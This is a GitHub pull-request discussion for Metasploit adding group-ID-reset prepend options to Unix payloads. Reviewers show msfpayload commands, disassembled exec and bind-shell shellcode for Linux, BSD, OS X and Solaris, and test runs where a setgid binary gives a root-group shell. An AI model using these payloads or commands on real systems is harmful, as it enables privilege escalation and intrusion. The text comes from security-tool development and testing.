New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
add PrependSet[re]gid support for unix* payloads #885
Conversation
Looked at the linux x86 case. Disass looks good: $ ./msfpayload linux/x86/exec CMD=/bin/bash PrependSetresgid=true PrependSetregid=true PrependSetgid=true R > exec_sh.raw ndisasm exec_sh.raw 00000000 31C9 xor cx,cx // PrependSetresgid 00000002 31DB xor bx,bx 00000004 F7E3 mul bx 00000006 B0AA mov al,0xaa 00000008 CD80 int 0x80 0000000A 31C9 xor cx,cx // PrependSetregid 0000000C 31DB xor bx,bx 0000000E 6A47 push byte +0x47 00000010 58 pop ax 00000011 CD80 int 0x80 00000013 31DB xor bx,bx // PrependSetgid 00000015 6A2E push byte +0x2e 00000017 58 pop ax 00000018 CD80 int 0x80 0000001A 6A0B push byte +0xb // Shellcode 0000001C 58 pop ax 0000001D 99 cwd 0000001E 52 push dx 0000001F 66682D6389E7 push dword 0xe789632d 00000025 682F73 push word 0x732f 00000028 680068 push word 0x6800 0000002B 2F das 0000002C 62696E bound bp,[bx+di+0x6e] 0000002F 89E3 mov bx,sp 00000031 52 push dx 00000032 E80A00 call word 0x3f 00000035 0000 add [bx+si],al 00000037 2F das 00000038 62696E bound bp,[bx+di+0x6e] 0000003B 2F das 0000003C 626173 bound sp,[bx+di+0x73] 0000003F 680057 push word 0x5700 00000042 53 push bx 00000043 89E1 mov cx,sp 00000045 CD80 int 0x80 And the test on Debian 6 was successfull: juan@debiansmb:~$ ls -la exec_sh.elf -rwsr-sr-x 1 root root 155 Oct 11 12:27 exec_sh.elf juan@debiansmb:~$ id uid=1000(juan) gid=1000(juan) groups=1000(juan),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),109(bluetooth),115(scanner) juan@debiansmb:~$ ./exec_sh.elf bash-4.1$ id uid=1000(juan) gid=0(root) groups=1000(juan),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),109(bluetooth),115(scanner) |
The Linux case for x86_64 platforms also looks good for me: The output for: ./msfpayload linux/x64/exec CMD=/bin/bash PrependSetresgid=true PrependSetregid=true PrependSetgid=true R > exec_64_sh.raw is: 00000000 4831FF xor rdi,rdi // PrependSetresgid 00000003 4889FE mov rsi,rdi 00000006 6A77 push byte +0x77 00000008 58 pop rax 00000009 0F05 loadall286 0000000B 4831FF xor rdi,rdi // PrependSetregid 0000000E 4889FE mov rsi,rdi 00000011 4889F2 mov rdx,rsi 00000014 6A72 push byte +0x72 00000016 58 pop rax 00000017 0F05 loadall286 00000019 4831FF xor rdi,rdi // PrependSetgid 0000001C 6A6A push byte +0x6a 0000001E 58 pop rax 0000001F 0F05 loadall286 00000021 6A3B push byte +0x3b // shellcode 00000023 58 pop rax 00000024 99 cdq 00000025 48BB2F62696E2F73 mov rbx,0x68732f6e69622f -6800 0000002F 53 push rbx 00000030 4889E7 mov rdi,rsp 00000033 68 db 0x68 00000034 2D63000048 sub eax,0x48000063 00000039 89E6 mov esi,esp 0000003B 52 push rdx 0000003C E80A000000 call dword 0x4b 00000041 2F db 0x2f 00000042 62 db 0x62 00000043 696E2F62617368 imul ebp,[rsi+0x2f],dword 0x68736162 0000004A 005657 add [rsi+0x57],dl 0000004D 4889E6 mov rsi,rsp 00000050 0F05 loadall286 And is working, tested on a ubuntu 10.04 x86_64: test@ubuntu:~$ ls -la exec_64_sh.elf -rwsr-sr-x 1 root root 202 2012-10-11 04:03 exec_64_sh.elf test@ubuntu:~$ id -G 1002 4 20 21 24 25 26 30 44 46 104 test@ubuntu:~$ ./exec_64_sh.elf bash-4.1$ id -G 0 4 20 21 24 25 26 30 44 46 104 1002 bash-4.1$ id -g 0 |
On the other hand... when testing the osx x86 case: $ ./msfpayload osx/x86/exec CMD=/bin/bash PrependSetresgid=true PrependSetregid=true PrependSetgid=true R > osx_x86.raw There is just the shellcode, any of the prepended code is: $ ndisasm -b 32 osx_x86.raw 00000000 31C0 xor eax,eax 00000002 50 push eax 00000003 E80A000000 call 0x12 00000008 2F das 00000009 62696E bound ebp,[ecx+0x6e] 0000000C 2F das 0000000D 626173 bound esp,[ecx+0x73] 00000010 68005E89E7 push dword 0xe7895e00 00000015 B90A000000 mov ecx,0xa 0000001A FC cld 0000001B F2A4 repne movsb 0000001D 89E3 mov ebx,esp 0000001F 50 push eax 00000020 50 push eax 00000021 53 push ebx 00000022 B03B mov al,0x3b 00000024 50 push eax 00000025 CD80 int 0x80 The same when using just the PrependSetuid option: $ ./msfpayload osx/x86/exec CMD=/bin/bash PrependSetuid=true R > osx_x86.raw Juans-MacBook-Pro:metasploit-framework juan$ ndisasm -b 32 osx_x86.raw 00000000 31C0 xor eax,eax 00000002 50 push eax 00000003 E80A000000 call 0x12 00000008 2F das 00000009 62696E bound ebp,[ecx+0x6e] 0000000C 2F das 0000000D 626173 bound esp,[ecx+0x73] 00000010 68005E89E7 push dword 0xe7895e00 00000015 B90A000000 mov ecx,0xa 0000001A FC cld 0000001B F2A4 repne movsb 0000001D 89E3 mov ebx,esp 0000001F 50 push eax 00000020 50 push eax 00000021 53 push ebx 00000022 B03B mov al,0x3b 00000024 50 push eax 00000025 CD80 int 0x80 I think here the problem is in exec payload module for osx x86, because it isn't including the mixin Msf::Payload::Osx, so the generate() function is not being redefined! btw: The exe payload module is the only osx payload module which doesn't include the Msf::Payload::Osx mixin. Anyway, I'll ask a more experienced developer to review it. |
While testing this pull request... I'm thinking why these prepends weren't available at msf, maybe because from the exploit point of view the uid is more interesting than the guid.... anyway I'll be checking this topic with more experienced developers! |
In the case of BSD the prepending is working as expected: $ ./msfpayload bsd/x86/exec CMD=/bin/bash PrependSetresgid=true PrependSetregid=true PrependSetgid=true R > exec_bsd.raw Juans-MacBook-Pro:metasploit-framework juan$ ndisasm -b 32 exec_bsd.raw 00000000 31C0 xor eax,eax //PrependSetresgid 00000002 50 push eax 00000003 50 push eax 00000004 50 push eax 00000005 50 push eax 00000006 66B83801 mov ax,0x138 0000000A CD80 int 0x80 0000000C 31C0 xor eax,eax //PrependSetregid 0000000E 50 push eax 0000000F 50 push eax 00000010 50 push eax 00000011 B07F mov al,0x7f 00000013 CD80 int 0x80 00000015 31C0 xor eax,eax //PrependSetgid 00000017 50 push eax 00000018 50 push eax 00000019 B0B5 mov al,0xb5 0000001B CD80 int 0x80 0000001D 6A3B push byte +0x3b //shellcode 0000001F 58 pop eax 00000020 99 cdq 00000021 52 push edx 00000022 682D630000 push dword 0x632d 00000027 89E7 mov edi,esp 00000029 52 push edx 0000002A 686E2F7368 push dword 0x68732f6e 0000002F 682F2F6269 push dword 0x69622f2f 00000034 89E3 mov ebx,esp 00000036 52 push edx 00000037 E80A000000 call 0x46 0000003C 2F das 0000003D 62696E bound ebp,[ecx+0x6e] 00000040 2F das 00000041 626173 bound esp,[ecx+0x73] 00000044 6800575389 push dword 0x89535700 00000049 E152 loope 0x9d 0000004B 51 push ecx 0000004C 53 push ebx 0000004D 50 push eax 0000004E CD80 int 0x80 And when executing: $ ls -la exec_bsd.elf -rwsr-sr-x 1 root juan 162 Oct 11 20:17 exec_bsd.elf $ ./exec_bsd.elf # id -g 0 # id -gr 0 |
I was wrong about the solaris case, its prepending the options correctly: Juans-MacBook-Pro:metasploit-framework juan$ ./msfpayload solaris/x86/shell_bind_tcp RHOST=192.168.1.137 LPORT=4444 PrependSetregid=true R > shell_bind_solaris.raw Juans-MacBook-Pro:metasploit-framework juan$ hexdump -C shell_bind_solaris.raw 00000000 68 ff d8 ff 3c 6a 65 89 e6 f7 56 04 f6 16 31 c0 |h...X...O.y.Ph/| 00000060 2f 73 68 68 2f 62 69 6e 89 e3 50 53 89 e1 50 51 |/shh/bin..PS..PQ| 00000070 53 b0 3b ff d6 |S.;..| 00000075 The prepending code for PrependSetregid has been added successfully at offset 0xe: 31 c0 50 50 b0 cb ff d6 Sorry for the inconveniences !! My fault! I'm just ask to a more experienced developer to do a final review of this pull request (in special the solaris case) of this pull request and #919 before merging! |
Finally merged :) thanks mephos! |
No description provided.